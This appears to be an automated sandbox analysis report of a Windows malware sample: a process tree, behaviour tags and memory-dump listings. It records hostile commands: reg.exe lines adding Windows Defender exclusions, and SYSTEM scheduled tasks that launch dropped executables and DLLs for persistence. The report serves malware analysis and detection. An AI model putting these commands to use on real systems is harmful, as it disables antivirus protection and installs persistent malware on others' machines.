                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5148
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5180
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5204
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:5224
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5260
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5284
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5312
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5348
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5428
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:5404
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:5480
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:5448
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:5056
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:5664
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:5700
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:5736
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:5948
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:5760
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:8204
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:8088
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 09:55:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe\" V8 /site_id 754 /S" /V1 /F
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                      PID:5820
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /run /I /tn "cbBtQoNpOByPPTwrn"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5868
                                                                                                                                                                                                                                    • C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe
                                                                                                                                                                                                                                      C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe V8 /site_id 754 /S
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:5924
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:6400
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6112
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:6272
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:6304
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:6368
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\XDReZe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:6012
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\HPKwcBM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:5388
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /END /TN "qTJPyBJZsADsDDd"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:6684
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "qTJPyBJZsADsDDd"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6732
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\treWaCh.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:6896
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\YwCwLnF.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:6948
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\TYmwRSM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:6988
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\LIWceyB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:7092
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 08:28:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll\",#1 /site_id 754" /V1 /F
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:7312
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /run /I /tn "hMZOFgVuABkGdcuhk"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:7224
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /CREATE /TN "spuuUmySUVfW" /SC once /ST 02:10:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe\" U4 /S"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:7196
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /run /I /tn "spuuUmySUVfW"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7536
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                          schtasks /END /TN "spuuUmySUVfW"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:7680
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "spuuUmySUVfW"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:7724
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "cbBtQoNpOByPPTwrn"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:7760
                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll",#1 /site_id 754
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll",#1 /site_id 754
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                  PID:7308
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:1372
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                PID:3452
                                                                                                                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2716
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\784B.tmp.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\784B.tmp.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                  PID:3392
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8122.tmp.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8122.tmp.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:7912
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8680.tmp.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8680.tmp.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:7928
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8D06.tmp.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8D06.tmp.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:7916
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 656
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:8004
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:7980
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:8060
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8076
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:8116
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:8140
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:8364
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:8420
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:7268
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7124
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                    taskeng.exe {9B3B28DA-2C6B-4222-866A-ADF54BC696A2} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3704
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                        PID:3688
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                          PID:3916
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                      taskeng.exe {91C5ACB5-0052-40A7-A804-3A4CDD5C7D96} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:2620
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                          PID:4376
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\scdvrab
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                            PID:4396

                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                      • memory/340-147-0x000007FEF77E0000-0x000007FEF7A5A000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        2.5MB

                                                                                                                                                                                                                                                                                      • memory/440-145-0x0000000002260000-0x0000000002271000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        68KB

                                                                                                                                                                                                                                                                                      • memory/440-150-0x0000000002260000-0x00000000022F6000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        600KB

                                                                                                                                                                                                                                                                                      • memory/440-151-0x0000000000400000-0x0000000000499000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        612KB

                                                                                                                                                                                                                                                                                      • memory/524-45-0x0000000002000000-0x0000000002001000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-53-0x00000000038E0000-0x00000000038E1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-49-0x00000000021C0000-0x00000000021C1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-46-0x0000000002010000-0x0000000002011000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-48-0x00000000021B0000-0x00000000021B1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-50-0x00000000021D0000-0x00000000021D1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-51-0x00000000021E0000-0x00000000021E1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-47-0x00000000021A0000-0x00000000021A1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-43-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-61-0x00000000039A0000-0x00000000039A1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-52-0x00000000038D0000-0x00000000038D1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-44-0x0000000001FF0000-0x0000000001FF1000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-54-0x0000000003930000-0x0000000003931000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-58-0x0000000003970000-0x0000000003971000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-60-0x0000000003990000-0x0000000003991000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-59-0x0000000003980000-0x0000000003981000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/524-57-0x0000000003960000-0x0000000003961000-memory.dmp

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

